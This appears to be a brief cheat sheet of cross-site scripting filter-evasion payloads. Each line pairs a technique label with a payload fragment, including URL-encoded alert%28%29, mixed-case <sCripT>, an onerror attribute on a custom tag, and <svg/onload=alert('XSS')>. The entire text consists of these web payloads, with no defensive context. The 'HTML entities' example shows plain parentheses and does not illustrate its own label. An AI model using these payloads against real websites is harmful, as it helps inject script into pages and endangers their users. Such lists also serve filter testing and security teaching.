( ( ( ----- HTML entities

alert%28%29 ----- URL encode

<script ------ Unfinished HTML tags

<sCripT> ------ Capitals

<x onerror=alert() src=x> ----- Custom HTML tags

al ert() ----- Embedded tabs

<svg/onload=alert('XSS')> ---- No space